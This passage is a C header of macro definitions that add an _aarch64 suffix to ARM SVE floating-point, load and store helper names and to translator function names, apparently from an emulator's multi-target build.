#define helper_sve_fminnms_s helper_sve_fminnms_s_aarch64
#define helper_sve_fminnms_d helper_sve_fminnms_d_aarch64
#define helper_sve_fmaxs_h helper_sve_fmaxs_h_aarch64
#define helper_sve_fmaxs_s helper_sve_fmaxs_s_aarch64
#define helper_sve_fmaxs_d helper_sve_fmaxs_d_aarch64
#define helper_sve_fmins_h helper_sve_fmins_h_aarch64
#define helper_sve_fmins_s helper_sve_fmins_s_aarch64
#define helper_sve_fmins_d helper_sve_fmins_d_aarch64
#define helper_sve_fcvt_sh helper_sve_fcvt_sh_aarch64
#define helper_sve_fcvt_hs helper_sve_fcvt_hs_aarch64
#define helper_sve_fcvt_dh helper_sve_fcvt_dh_aarch64
#define helper_sve_fcvt_hd helper_sve_fcvt_hd_aarch64
#define helper_sve_fcvt_ds helper_sve_fcvt_ds_aarch64
#define helper_sve_fcvt_sd helper_sve_fcvt_sd_aarch64
#define helper_sve_fcvtzs_hh helper_sve_fcvtzs_hh_aarch64
#define helper_sve_fcvtzs_hs helper_sve_fcvtzs_hs_aarch64
#define helper_sve_fcvtzs_ss helper_sve_fcvtzs_ss_aarch64
#define helper_sve_fcvtzs_hd helper_sve_fcvtzs_hd_aarch64
#define helper_sve_fcvtzs_sd helper_sve_fcvtzs_sd_aarch64
#define helper_sve_fcvtzs_ds helper_sve_fcvtzs_ds_aarch64
#define helper_sve_fcvtzs_dd helper_sve_fcvtzs_dd_aarch64
#define helper_sve_fcvtzu_hh helper_sve_fcvtzu_hh_aarch64
#define helper_sve_fcvtzu_hs helper_sve_fcvtzu_hs_aarch64
#define helper_sve_fcvtzu_ss helper_sve_fcvtzu_ss_aarch64
#define helper_sve_fcvtzu_hd helper_sve_fcvtzu_hd_aarch64
#define helper_sve_fcvtzu_sd helper_sve_fcvtzu_sd_aarch64
#define helper_sve_fcvtzu_ds helper_sve_fcvtzu_ds_aarch64
#define helper_sve_fcvtzu_dd helper_sve_fcvtzu_dd_aarch64
#define helper_sve_frint_h helper_sve_frint_h_aarch64
#define helper_sve_frint_s helper_sve_frint_s_aarch64
#define helper_sve_frint_d helper_sve_frint_d_aarch64
#define helper_sve_frintx_h helper_sve_frintx_h_aarch64
#define helper_sve_frintx_s helper_sve_frintx_s_aarch64
#define helper_sve_frintx_d helper_sve_frintx_d_aarch64
#define helper_sve_frecpx_h helper_sve_frecpx_h_aarch64
#define helper_sve_frecpx_s helper_sve_frecpx_s_aarch64
#define helper_sve_frecpx_d helper_sve_frecpx_d_aarch64
#define helper_sve_fsqrt_h helper_sve_fsqrt_h_aarch64
#define helper_sve_fsqrt_s helper_sve_fsqrt_s_aarch64
#define helper_sve_fsqrt_d helper_sve_fsqrt_d_aarch64
#define helper_sve_scvt_hh helper_sve_scvt_hh_aarch64
#define helper_sve_scvt_sh helper_sve_scvt_sh_aarch64
#define helper_sve_scvt_ss helper_sve_scvt_ss_aarch64
#define helper_sve_scvt_sd helper_sve_scvt_sd_aarch64
#define helper_sve_scvt_dh helper_sve_scvt_dh_aarch64
#define helper_sve_scvt_ds helper_sve_scvt_ds_aarch64
#define helper_sve_scvt_dd helper_sve_scvt_dd_aarch64
#define helper_sve_ucvt_hh helper_sve_ucvt_hh_aarch64
#define helper_sve_ucvt_sh helper_sve_ucvt_sh_aarch64
#define helper_sve_ucvt_ss helper_sve_ucvt_ss_aarch64
#define helper_sve_ucvt_sd helper_sve_ucvt_sd_aarch64
#define helper_sve_ucvt_dh helper_sve_ucvt_dh_aarch64
#define helper_sve_ucvt_ds helper_sve_ucvt_ds_aarch64
#define helper_sve_ucvt_dd helper_sve_ucvt_dd_aarch64
#define helper_sve_fmla_zpzzz_h helper_sve_fmla_zpzzz_h_aarch64
#define helper_sve_fmls_zpzzz_h helper_sve_fmls_zpzzz_h_aarch64
#define helper_sve_fnmla_zpzzz_h helper_sve_fnmla_zpzzz_h_aarch64
#define helper_sve_fnmls_zpzzz_h helper_sve_fnmls_zpzzz_h_aarch64
#define helper_sve_fmla_zpzzz_s helper_sve_fmla_zpzzz_s_aarch64
#define helper_sve_fmls_zpzzz_s helper_sve_fmls_zpzzz_s_aarch64
#define helper_sve_fnmla_zpzzz_s helper_sve_fnmla_zpzzz_s_aarch64
#define helper_sve_fnmls_zpzzz_s helper_sve_fnmls_zpzzz_s_aarch64
#define helper_sve_fmla_zpzzz_d helper_sve_fmla_zpzzz_d_aarch64
#define helper_sve_fmls_zpzzz_d helper_sve_fmls_zpzzz_d_aarch64
#define helper_sve_fnmla_zpzzz_d helper_sve_fnmla_zpzzz_d_aarch64
#define helper_sve_fnmls_zpzzz_d helper_sve_fnmls_zpzzz_d_aarch64
#define helper_sve_fcmge_h helper_sve_fcmge_h_aarch64
#define helper_sve_fcmge_s helper_sve_fcmge_s_aarch64
#define helper_sve_fcmge_d helper_sve_fcmge_d_aarch64
#define helper_sve_fcmgt_h helper_sve_fcmgt_h_aarch64
#define helper_sve_fcmgt_s helper_sve_fcmgt_s_aarch64
#define helper_sve_fcmgt_d helper_sve_fcmgt_d_aarch64
#define helper_sve_fcmeq_h helper_sve_fcmeq_h_aarch64
#define helper_sve_fcmeq_s helper_sve_fcmeq_s_aarch64
#define helper_sve_fcmeq_d helper_sve_fcmeq_d_aarch64
#define helper_sve_fcmne_h helper_sve_fcmne_h_aarch64
#define helper_sve_fcmne_s helper_sve_fcmne_s_aarch64
#define helper_sve_fcmne_d helper_sve_fcmne_d_aarch64
#define helper_sve_fcmuo_h helper_sve_fcmuo_h_aarch64
#define helper_sve_fcmuo_s helper_sve_fcmuo_s_aarch64
#define helper_sve_fcmuo_d helper_sve_fcmuo_d_aarch64
#define helper_sve_facge_h helper_sve_facge_h_aarch64
#define helper_sve_facge_s helper_sve_facge_s_aarch64
#define helper_sve_facge_d helper_sve_facge_d_aarch64
#define helper_sve_facgt_h helper_sve_facgt_h_aarch64
#define helper_sve_facgt_s helper_sve_facgt_s_aarch64
#define helper_sve_facgt_d helper_sve_facgt_d_aarch64
#define helper_sve_fcmge0_h helper_sve_fcmge0_h_aarch64
#define helper_sve_fcmge0_s helper_sve_fcmge0_s_aarch64
#define helper_sve_fcmge0_d helper_sve_fcmge0_d_aarch64
#define helper_sve_fcmgt0_h helper_sve_fcmgt0_h_aarch64
#define helper_sve_fcmgt0_s helper_sve_fcmgt0_s_aarch64
#define helper_sve_fcmgt0_d helper_sve_fcmgt0_d_aarch64
#define helper_sve_fcmle0_h helper_sve_fcmle0_h_aarch64
#define helper_sve_fcmle0_s helper_sve_fcmle0_s_aarch64
#define helper_sve_fcmle0_d helper_sve_fcmle0_d_aarch64
#define helper_sve_fcmlt0_h helper_sve_fcmlt0_h_aarch64
#define helper_sve_fcmlt0_s helper_sve_fcmlt0_s_aarch64
#define helper_sve_fcmlt0_d helper_sve_fcmlt0_d_aarch64
#define helper_sve_fcmeq0_h helper_sve_fcmeq0_h_aarch64
#define helper_sve_fcmeq0_s helper_sve_fcmeq0_s_aarch64
#define helper_sve_fcmeq0_d helper_sve_fcmeq0_d_aarch64
#define helper_sve_fcmne0_h helper_sve_fcmne0_h_aarch64
#define helper_sve_fcmne0_s helper_sve_fcmne0_s_aarch64
#define helper_sve_fcmne0_d helper_sve_fcmne0_d_aarch64
#define helper_sve_ftmad_h helper_sve_ftmad_h_aarch64
#define helper_sve_ftmad_s helper_sve_ftmad_s_aarch64
#define helper_sve_ftmad_d helper_sve_ftmad_d_aarch64
#define helper_sve_fcadd_h helper_sve_fcadd_h_aarch64
#define helper_sve_fcadd_s helper_sve_fcadd_s_aarch64
#define helper_sve_fcadd_d helper_sve_fcadd_d_aarch64
#define helper_sve_fcmla_zpzzz_h helper_sve_fcmla_zpzzz_h_aarch64
#define helper_sve_fcmla_zpzzz_s helper_sve_fcmla_zpzzz_s_aarch64
#define helper_sve_fcmla_zpzzz_d helper_sve_fcmla_zpzzz_d_aarch64
#define helper_sve_ld1bb_r helper_sve_ld1bb_r_aarch64
#define helper_sve_ld1bhu_r helper_sve_ld1bhu_r_aarch64
#define helper_sve_ld1bhs_r helper_sve_ld1bhs_r_aarch64
#define helper_sve_ld1bsu_r helper_sve_ld1bsu_r_aarch64
#define helper_sve_ld1bss_r helper_sve_ld1bss_r_aarch64
#define helper_sve_ld1bdu_r helper_sve_ld1bdu_r_aarch64
#define helper_sve_ld1bds_r helper_sve_ld1bds_r_aarch64
#define helper_sve_ld1hh_le_r helper_sve_ld1hh_le_r_aarch64
#define helper_sve_ld1hh_be_r helper_sve_ld1hh_be_r_aarch64
#define helper_sve_ld1hsu_le_r helper_sve_ld1hsu_le_r_aarch64
#define helper_sve_ld1hsu_be_r helper_sve_ld1hsu_be_r_aarch64
#define helper_sve_ld1hss_le_r helper_sve_ld1hss_le_r_aarch64
#define helper_sve_ld1hss_be_r helper_sve_ld1hss_be_r_aarch64
#define helper_sve_ld1hdu_le_r helper_sve_ld1hdu_le_r_aarch64
#define helper_sve_ld1hdu_be_r helper_sve_ld1hdu_be_r_aarch64
#define helper_sve_ld1hds_le_r helper_sve_ld1hds_le_r_aarch64
#define helper_sve_ld1hds_be_r helper_sve_ld1hds_be_r_aarch64
#define helper_sve_ld1ss_le_r helper_sve_ld1ss_le_r_aarch64
#define helper_sve_ld1ss_be_r helper_sve_ld1ss_be_r_aarch64
#define helper_sve_ld1sdu_le_r helper_sve_ld1sdu_le_r_aarch64
#define helper_sve_ld1sdu_be_r helper_sve_ld1sdu_be_r_aarch64
#define helper_sve_ld1sds_le_r helper_sve_ld1sds_le_r_aarch64
#define helper_sve_ld1sds_be_r helper_sve_ld1sds_be_r_aarch64
#define helper_sve_ld1dd_le_r helper_sve_ld1dd_le_r_aarch64
#define helper_sve_ld1dd_be_r helper_sve_ld1dd_be_r_aarch64
#define helper_sve_ld2bb_r helper_sve_ld2bb_r_aarch64
#define helper_sve_ld3bb_r helper_sve_ld3bb_r_aarch64
#define helper_sve_ld4bb_r helper_sve_ld4bb_r_aarch64
#define helper_sve_ld2hh_le_r helper_sve_ld2hh_le_r_aarch64
#define helper_sve_ld2hh_be_r helper_sve_ld2hh_be_r_aarch64
#define helper_sve_ld3hh_le_r helper_sve_ld3hh_le_r_aarch64
#define helper_sve_ld3hh_be_r helper_sve_ld3hh_be_r_aarch64
#define helper_sve_ld4hh_le_r helper_sve_ld4hh_le_r_aarch64
#define helper_sve_ld4hh_be_r helper_sve_ld4hh_be_r_aarch64
#define helper_sve_ld2ss_le_r helper_sve_ld2ss_le_r_aarch64
#define helper_sve_ld2ss_be_r helper_sve_ld2ss_be_r_aarch64
#define helper_sve_ld3ss_le_r helper_sve_ld3ss_le_r_aarch64
#define helper_sve_ld3ss_be_r helper_sve_ld3ss_be_r_aarch64
#define helper_sve_ld4ss_le_r helper_sve_ld4ss_le_r_aarch64
#define helper_sve_ld4ss_be_r helper_sve_ld4ss_be_r_aarch64
#define helper_sve_ld2dd_le_r helper_sve_ld2dd_le_r_aarch64
#define helper_sve_ld2dd_be_r helper_sve_ld2dd_be_r_aarch64
#define helper_sve_ld3dd_le_r helper_sve_ld3dd_le_r_aarch64
#define helper_sve_ld3dd_be_r helper_sve_ld3dd_be_r_aarch64
#define helper_sve_ld4dd_le_r helper_sve_ld4dd_le_r_aarch64
#define helper_sve_ld4dd_be_r helper_sve_ld4dd_be_r_aarch64
#define helper_sve_ldff1bb_r helper_sve_ldff1bb_r_aarch64
#define helper_sve_ldnf1bb_r helper_sve_ldnf1bb_r_aarch64
#define helper_sve_ldff1bhu_r helper_sve_ldff1bhu_r_aarch64
#define helper_sve_ldnf1bhu_r helper_sve_ldnf1bhu_r_aarch64
#define helper_sve_ldff1bhs_r helper_sve_ldff1bhs_r_aarch64
#define helper_sve_ldnf1bhs_r helper_sve_ldnf1bhs_r_aarch64
#define helper_sve_ldff1bsu_r helper_sve_ldff1bsu_r_aarch64
#define helper_sve_ldnf1bsu_r helper_sve_ldnf1bsu_r_aarch64
#define helper_sve_ldff1bss_r helper_sve_ldff1bss_r_aarch64
#define helper_sve_ldnf1bss_r helper_sve_ldnf1bss_r_aarch64
#define helper_sve_ldff1bdu_r helper_sve_ldff1bdu_r_aarch64
#define helper_sve_ldnf1bdu_r helper_sve_ldnf1bdu_r_aarch64
#define helper_sve_ldff1bds_r helper_sve_ldff1bds_r_aarch64
#define helper_sve_ldnf1bds_r helper_sve_ldnf1bds_r_aarch64
#define helper_sve_ldff1hh_le_r helper_sve_ldff1hh_le_r_aarch64
#define helper_sve_ldnf1hh_le_r helper_sve_ldnf1hh_le_r_aarch64
#define helper_sve_ldff1hh_be_r helper_sve_ldff1hh_be_r_aarch64
#define helper_sve_ldnf1hh_be_r helper_sve_ldnf1hh_be_r_aarch64
#define helper_sve_ldff1hsu_le_r helper_sve_ldff1hsu_le_r_aarch64
#define helper_sve_ldnf1hsu_le_r helper_sve_ldnf1hsu_le_r_aarch64
#define helper_sve_ldff1hsu_be_r helper_sve_ldff1hsu_be_r_aarch64
#define helper_sve_ldnf1hsu_be_r helper_sve_ldnf1hsu_be_r_aarch64
#define helper_sve_ldff1hss_le_r helper_sve_ldff1hss_le_r_aarch64
#define helper_sve_ldnf1hss_le_r helper_sve_ldnf1hss_le_r_aarch64
#define helper_sve_ldff1hss_be_r helper_sve_ldff1hss_be_r_aarch64
#define helper_sve_ldnf1hss_be_r helper_sve_ldnf1hss_be_r_aarch64
#define helper_sve_ldff1hdu_le_r helper_sve_ldff1hdu_le_r_aarch64
#define helper_sve_ldnf1hdu_le_r helper_sve_ldnf1hdu_le_r_aarch64
#define helper_sve_ldff1hdu_be_r helper_sve_ldff1hdu_be_r_aarch64
#define helper_sve_ldnf1hdu_be_r helper_sve_ldnf1hdu_be_r_aarch64
#define
helper_sve_ldff1hds_le_r helper_sve_ldff1hds_le_r_aarch64 #define helper_sve_ldnf1hds_le_r helper_sve_ldnf1hds_le_r_aarch64 #define helper_sve_ldff1hds_be_r helper_sve_ldff1hds_be_r_aarch64 #define helper_sve_ldnf1hds_be_r helper_sve_ldnf1hds_be_r_aarch64 #define helper_sve_ldff1ss_le_r helper_sve_ldff1ss_le_r_aarch64 #define helper_sve_ldnf1ss_le_r helper_sve_ldnf1ss_le_r_aarch64 #define helper_sve_ldff1ss_be_r helper_sve_ldff1ss_be_r_aarch64 #define helper_sve_ldnf1ss_be_r helper_sve_ldnf1ss_be_r_aarch64 #define helper_sve_ldff1sdu_le_r helper_sve_ldff1sdu_le_r_aarch64 #define helper_sve_ldnf1sdu_le_r helper_sve_ldnf1sdu_le_r_aarch64 #define helper_sve_ldff1sdu_be_r helper_sve_ldff1sdu_be_r_aarch64 #define helper_sve_ldnf1sdu_be_r helper_sve_ldnf1sdu_be_r_aarch64 #define helper_sve_ldff1sds_le_r helper_sve_ldff1sds_le_r_aarch64 #define helper_sve_ldnf1sds_le_r helper_sve_ldnf1sds_le_r_aarch64 #define helper_sve_ldff1sds_be_r helper_sve_ldff1sds_be_r_aarch64 #define helper_sve_ldnf1sds_be_r helper_sve_ldnf1sds_be_r_aarch64 #define helper_sve_ldff1dd_le_r helper_sve_ldff1dd_le_r_aarch64 #define helper_sve_ldnf1dd_le_r helper_sve_ldnf1dd_le_r_aarch64 #define helper_sve_ldff1dd_be_r helper_sve_ldff1dd_be_r_aarch64 #define helper_sve_ldnf1dd_be_r helper_sve_ldnf1dd_be_r_aarch64 #define helper_sve_st1bb_r helper_sve_st1bb_r_aarch64 #define helper_sve_st1bh_r helper_sve_st1bh_r_aarch64 #define helper_sve_st1bs_r helper_sve_st1bs_r_aarch64 #define helper_sve_st1bd_r helper_sve_st1bd_r_aarch64 #define helper_sve_st2bb_r helper_sve_st2bb_r_aarch64 #define helper_sve_st3bb_r helper_sve_st3bb_r_aarch64 #define helper_sve_st4bb_r helper_sve_st4bb_r_aarch64 #define helper_sve_st1hh_le_r helper_sve_st1hh_le_r_aarch64 #define helper_sve_st1hh_be_r helper_sve_st1hh_be_r_aarch64 #define helper_sve_st1hs_le_r helper_sve_st1hs_le_r_aarch64 #define helper_sve_st1hs_be_r helper_sve_st1hs_be_r_aarch64 #define helper_sve_st1hd_le_r helper_sve_st1hd_le_r_aarch64 #define helper_sve_st1hd_be_r helper_sve_st1hd_be_r_aarch64 #define helper_sve_st2hh_le_r helper_sve_st2hh_le_r_aarch64 #define helper_sve_st2hh_be_r helper_sve_st2hh_be_r_aarch64 #define helper_sve_st3hh_le_r helper_sve_st3hh_le_r_aarch64 #define helper_sve_st3hh_be_r helper_sve_st3hh_be_r_aarch64 #define helper_sve_st4hh_le_r helper_sve_st4hh_le_r_aarch64 #define helper_sve_st4hh_be_r helper_sve_st4hh_be_r_aarch64 #define helper_sve_st1ss_le_r helper_sve_st1ss_le_r_aarch64 #define helper_sve_st1ss_be_r helper_sve_st1ss_be_r_aarch64 #define helper_sve_st1sd_le_r helper_sve_st1sd_le_r_aarch64 #define helper_sve_st1sd_be_r helper_sve_st1sd_be_r_aarch64 #define helper_sve_st2ss_le_r helper_sve_st2ss_le_r_aarch64 #define helper_sve_st2ss_be_r helper_sve_st2ss_be_r_aarch64 #define helper_sve_st3ss_le_r helper_sve_st3ss_le_r_aarch64 #define helper_sve_st3ss_be_r helper_sve_st3ss_be_r_aarch64 #define helper_sve_st4ss_le_r helper_sve_st4ss_le_r_aarch64 #define helper_sve_st4ss_be_r helper_sve_st4ss_be_r_aarch64 #define helper_sve_st1dd_le_r helper_sve_st1dd_le_r_aarch64 #define helper_sve_st1dd_be_r helper_sve_st1dd_be_r_aarch64 #define helper_sve_st2dd_le_r helper_sve_st2dd_le_r_aarch64 #define helper_sve_st2dd_be_r helper_sve_st2dd_be_r_aarch64 #define helper_sve_st3dd_le_r helper_sve_st3dd_le_r_aarch64 #define helper_sve_st3dd_be_r helper_sve_st3dd_be_r_aarch64 #define helper_sve_st4dd_le_r helper_sve_st4dd_le_r_aarch64 #define helper_sve_st4dd_be_r helper_sve_st4dd_be_r_aarch64 #define helper_sve_ldbsu_zsu helper_sve_ldbsu_zsu_aarch64 #define 
helper_sve_ldbsu_zss helper_sve_ldbsu_zss_aarch64 #define helper_sve_ldbdu_zsu helper_sve_ldbdu_zsu_aarch64 #define helper_sve_ldbdu_zss helper_sve_ldbdu_zss_aarch64 #define helper_sve_ldbdu_zd helper_sve_ldbdu_zd_aarch64 #define helper_sve_ldbss_zsu helper_sve_ldbss_zsu_aarch64 #define helper_sve_ldbss_zss helper_sve_ldbss_zss_aarch64 #define helper_sve_ldbds_zsu helper_sve_ldbds_zsu_aarch64 #define helper_sve_ldbds_zss helper_sve_ldbds_zss_aarch64 #define helper_sve_ldbds_zd helper_sve_ldbds_zd_aarch64 #define helper_sve_ldhsu_le_zsu helper_sve_ldhsu_le_zsu_aarch64 #define helper_sve_ldhsu_le_zss helper_sve_ldhsu_le_zss_aarch64 #define helper_sve_ldhdu_le_zsu helper_sve_ldhdu_le_zsu_aarch64 #define helper_sve_ldhdu_le_zss helper_sve_ldhdu_le_zss_aarch64 #define helper_sve_ldhdu_le_zd helper_sve_ldhdu_le_zd_aarch64 #define helper_sve_ldhsu_be_zsu helper_sve_ldhsu_be_zsu_aarch64 #define helper_sve_ldhsu_be_zss helper_sve_ldhsu_be_zss_aarch64 #define helper_sve_ldhdu_be_zsu helper_sve_ldhdu_be_zsu_aarch64 #define helper_sve_ldhdu_be_zss helper_sve_ldhdu_be_zss_aarch64 #define helper_sve_ldhdu_be_zd helper_sve_ldhdu_be_zd_aarch64 #define helper_sve_ldhss_le_zsu helper_sve_ldhss_le_zsu_aarch64 #define helper_sve_ldhss_le_zss helper_sve_ldhss_le_zss_aarch64 #define helper_sve_ldhds_le_zsu helper_sve_ldhds_le_zsu_aarch64 #define helper_sve_ldhds_le_zss helper_sve_ldhds_le_zss_aarch64 #define helper_sve_ldhds_le_zd helper_sve_ldhds_le_zd_aarch64 #define helper_sve_ldhss_be_zsu helper_sve_ldhss_be_zsu_aarch64 #define helper_sve_ldhss_be_zss helper_sve_ldhss_be_zss_aarch64 #define helper_sve_ldhds_be_zsu helper_sve_ldhds_be_zsu_aarch64 #define helper_sve_ldhds_be_zss helper_sve_ldhds_be_zss_aarch64 #define helper_sve_ldhds_be_zd helper_sve_ldhds_be_zd_aarch64 #define helper_sve_ldss_le_zsu helper_sve_ldss_le_zsu_aarch64 #define helper_sve_ldss_le_zss helper_sve_ldss_le_zss_aarch64 #define helper_sve_ldsdu_le_zsu helper_sve_ldsdu_le_zsu_aarch64 #define helper_sve_ldsdu_le_zss helper_sve_ldsdu_le_zss_aarch64 #define helper_sve_ldsdu_le_zd helper_sve_ldsdu_le_zd_aarch64 #define helper_sve_ldss_be_zsu helper_sve_ldss_be_zsu_aarch64 #define helper_sve_ldss_be_zss helper_sve_ldss_be_zss_aarch64 #define helper_sve_ldsdu_be_zsu helper_sve_ldsdu_be_zsu_aarch64 #define helper_sve_ldsdu_be_zss helper_sve_ldsdu_be_zss_aarch64 #define helper_sve_ldsdu_be_zd helper_sve_ldsdu_be_zd_aarch64 #define helper_sve_ldsds_le_zsu helper_sve_ldsds_le_zsu_aarch64 #define helper_sve_ldsds_le_zss helper_sve_ldsds_le_zss_aarch64 #define helper_sve_ldsds_le_zd helper_sve_ldsds_le_zd_aarch64 #define helper_sve_ldsds_be_zsu helper_sve_ldsds_be_zsu_aarch64 #define helper_sve_ldsds_be_zss helper_sve_ldsds_be_zss_aarch64 #define helper_sve_ldsds_be_zd helper_sve_ldsds_be_zd_aarch64 #define helper_sve_lddd_le_zsu helper_sve_lddd_le_zsu_aarch64 #define helper_sve_lddd_le_zss helper_sve_lddd_le_zss_aarch64 #define helper_sve_lddd_le_zd helper_sve_lddd_le_zd_aarch64 #define helper_sve_lddd_be_zsu helper_sve_lddd_be_zsu_aarch64 #define helper_sve_lddd_be_zss helper_sve_lddd_be_zss_aarch64 #define helper_sve_lddd_be_zd helper_sve_lddd_be_zd_aarch64 #define helper_sve_ldffbsu_zsu helper_sve_ldffbsu_zsu_aarch64 #define helper_sve_ldffbsu_zss helper_sve_ldffbsu_zss_aarch64 #define helper_sve_ldffbdu_zsu helper_sve_ldffbdu_zsu_aarch64 #define helper_sve_ldffbdu_zss helper_sve_ldffbdu_zss_aarch64 #define helper_sve_ldffbdu_zd helper_sve_ldffbdu_zd_aarch64 #define helper_sve_ldffbss_zsu helper_sve_ldffbss_zsu_aarch64 #define 
helper_sve_ldffbss_zss helper_sve_ldffbss_zss_aarch64 #define helper_sve_ldffbds_zsu helper_sve_ldffbds_zsu_aarch64 #define helper_sve_ldffbds_zss helper_sve_ldffbds_zss_aarch64 #define helper_sve_ldffbds_zd helper_sve_ldffbds_zd_aarch64 #define helper_sve_ldffhsu_le_zsu helper_sve_ldffhsu_le_zsu_aarch64 #define helper_sve_ldffhsu_le_zss helper_sve_ldffhsu_le_zss_aarch64 #define helper_sve_ldffhdu_le_zsu helper_sve_ldffhdu_le_zsu_aarch64 #define helper_sve_ldffhdu_le_zss helper_sve_ldffhdu_le_zss_aarch64 #define helper_sve_ldffhdu_le_zd helper_sve_ldffhdu_le_zd_aarch64 #define helper_sve_ldffhsu_be_zsu helper_sve_ldffhsu_be_zsu_aarch64 #define helper_sve_ldffhsu_be_zss helper_sve_ldffhsu_be_zss_aarch64 #define helper_sve_ldffhdu_be_zsu helper_sve_ldffhdu_be_zsu_aarch64 #define helper_sve_ldffhdu_be_zss helper_sve_ldffhdu_be_zss_aarch64 #define helper_sve_ldffhdu_be_zd helper_sve_ldffhdu_be_zd_aarch64 #define helper_sve_ldffhss_le_zsu helper_sve_ldffhss_le_zsu_aarch64 #define helper_sve_ldffhss_le_zss helper_sve_ldffhss_le_zss_aarch64 #define helper_sve_ldffhds_le_zsu helper_sve_ldffhds_le_zsu_aarch64 #define helper_sve_ldffhds_le_zss helper_sve_ldffhds_le_zss_aarch64 #define helper_sve_ldffhds_le_zd helper_sve_ldffhds_le_zd_aarch64 #define helper_sve_ldffhss_be_zsu helper_sve_ldffhss_be_zsu_aarch64 #define helper_sve_ldffhss_be_zss helper_sve_ldffhss_be_zss_aarch64 #define helper_sve_ldffhds_be_zsu helper_sve_ldffhds_be_zsu_aarch64 #define helper_sve_ldffhds_be_zss helper_sve_ldffhds_be_zss_aarch64 #define helper_sve_ldffhds_be_zd helper_sve_ldffhds_be_zd_aarch64 #define helper_sve_ldffss_le_zsu helper_sve_ldffss_le_zsu_aarch64 #define helper_sve_ldffss_le_zss helper_sve_ldffss_le_zss_aarch64 #define helper_sve_ldffsdu_le_zsu helper_sve_ldffsdu_le_zsu_aarch64 #define helper_sve_ldffsdu_le_zss helper_sve_ldffsdu_le_zss_aarch64 #define helper_sve_ldffsdu_le_zd helper_sve_ldffsdu_le_zd_aarch64 #define helper_sve_ldffss_be_zsu helper_sve_ldffss_be_zsu_aarch64 #define helper_sve_ldffss_be_zss helper_sve_ldffss_be_zss_aarch64 #define helper_sve_ldffsdu_be_zsu helper_sve_ldffsdu_be_zsu_aarch64 #define helper_sve_ldffsdu_be_zss helper_sve_ldffsdu_be_zss_aarch64 #define helper_sve_ldffsdu_be_zd helper_sve_ldffsdu_be_zd_aarch64 #define helper_sve_ldffsds_le_zsu helper_sve_ldffsds_le_zsu_aarch64 #define helper_sve_ldffsds_le_zss helper_sve_ldffsds_le_zss_aarch64 #define helper_sve_ldffsds_le_zd helper_sve_ldffsds_le_zd_aarch64 #define helper_sve_ldffsds_be_zsu helper_sve_ldffsds_be_zsu_aarch64 #define helper_sve_ldffsds_be_zss helper_sve_ldffsds_be_zss_aarch64 #define helper_sve_ldffsds_be_zd helper_sve_ldffsds_be_zd_aarch64 #define helper_sve_ldffdd_le_zsu helper_sve_ldffdd_le_zsu_aarch64 #define helper_sve_ldffdd_le_zss helper_sve_ldffdd_le_zss_aarch64 #define helper_sve_ldffdd_le_zd helper_sve_ldffdd_le_zd_aarch64 #define helper_sve_ldffdd_be_zsu helper_sve_ldffdd_be_zsu_aarch64 #define helper_sve_ldffdd_be_zss helper_sve_ldffdd_be_zss_aarch64 #define helper_sve_ldffdd_be_zd helper_sve_ldffdd_be_zd_aarch64 #define helper_sve_stbs_zsu helper_sve_stbs_zsu_aarch64 #define helper_sve_sths_le_zsu helper_sve_sths_le_zsu_aarch64 #define helper_sve_sths_be_zsu helper_sve_sths_be_zsu_aarch64 #define helper_sve_stss_le_zsu helper_sve_stss_le_zsu_aarch64 #define helper_sve_stss_be_zsu helper_sve_stss_be_zsu_aarch64 #define helper_sve_stbs_zss helper_sve_stbs_zss_aarch64 #define helper_sve_sths_le_zss helper_sve_sths_le_zss_aarch64 #define helper_sve_sths_be_zss helper_sve_sths_be_zss_aarch64 #define 
helper_sve_stss_le_zss helper_sve_stss_le_zss_aarch64 #define helper_sve_stss_be_zss helper_sve_stss_be_zss_aarch64 #define helper_sve_stbd_zsu helper_sve_stbd_zsu_aarch64 #define helper_sve_sthd_le_zsu helper_sve_sthd_le_zsu_aarch64 #define helper_sve_sthd_be_zsu helper_sve_sthd_be_zsu_aarch64 #define helper_sve_stsd_le_zsu helper_sve_stsd_le_zsu_aarch64 #define helper_sve_stsd_be_zsu helper_sve_stsd_be_zsu_aarch64 #define helper_sve_stdd_le_zsu helper_sve_stdd_le_zsu_aarch64 #define helper_sve_stdd_be_zsu helper_sve_stdd_be_zsu_aarch64 #define helper_sve_stbd_zss helper_sve_stbd_zss_aarch64 #define helper_sve_sthd_le_zss helper_sve_sthd_le_zss_aarch64 #define helper_sve_sthd_be_zss helper_sve_sthd_be_zss_aarch64 #define helper_sve_stsd_le_zss helper_sve_stsd_le_zss_aarch64 #define helper_sve_stsd_be_zss helper_sve_stsd_be_zss_aarch64 #define helper_sve_stdd_le_zss helper_sve_stdd_le_zss_aarch64 #define helper_sve_stdd_be_zss helper_sve_stdd_be_zss_aarch64 #define helper_sve_stbd_zd helper_sve_stbd_zd_aarch64 #define helper_sve_sthd_le_zd helper_sve_sthd_le_zd_aarch64 #define helper_sve_sthd_be_zd helper_sve_sthd_be_zd_aarch64 #define helper_sve_stsd_le_zd helper_sve_stsd_le_zd_aarch64 #define helper_sve_stsd_be_zd helper_sve_stsd_be_zd_aarch64 #define helper_sve_stdd_le_zd helper_sve_stdd_le_zd_aarch64 #define helper_sve_stdd_be_zd helper_sve_stdd_be_zd_aarch64 #define arm_cpu_do_unaligned_access arm_cpu_do_unaligned_access_aarch64 #define arm_cpu_do_transaction_failed arm_cpu_do_transaction_failed_aarch64 #define arm_cpu_tlb_fill arm_cpu_tlb_fill_aarch64 #define a64_translate_init a64_translate_init_aarch64 #define gen_a64_set_pc_im gen_a64_set_pc_im_aarch64 #define unallocated_encoding unallocated_encoding_aarch64 #define new_tmp_a64 new_tmp_a64_aarch64 #define new_tmp_a64_zero new_tmp_a64_zero_aarch64 #define cpu_reg cpu_reg_aarch64 #define cpu_reg_sp cpu_reg_sp_aarch64 #define read_cpu_reg read_cpu_reg_aarch64 #define read_cpu_reg_sp read_cpu_reg_sp_aarch64 #define write_fp_dreg write_fp_dreg_aarch64 #define get_fpstatus_ptr get_fpstatus_ptr_aarch64 #define sve_access_check sve_access_check_aarch64 #define logic_imm_decode_wmask logic_imm_decode_wmask_aarch64 #define arm_translate_init arm_translate_init_aarch64 #define arm_test_cc arm_test_cc_aarch64 #define arm_free_cc arm_free_cc_aarch64 #define arm_jump_cc arm_jump_cc_aarch64 #define arm_gen_test_cc arm_gen_test_cc_aarch64 #define vfp_expand_imm vfp_expand_imm_aarch64 #define gen_cmtst_i64 gen_cmtst_i64_aarch64 #define gen_ushl_i32 gen_ushl_i32_aarch64 #define gen_ushl_i64 gen_ushl_i64_aarch64 #define gen_sshl_i32 gen_sshl_i32_aarch64 #define gen_sshl_i64 gen_sshl_i64_aarch64 #define gen_intermediate_code 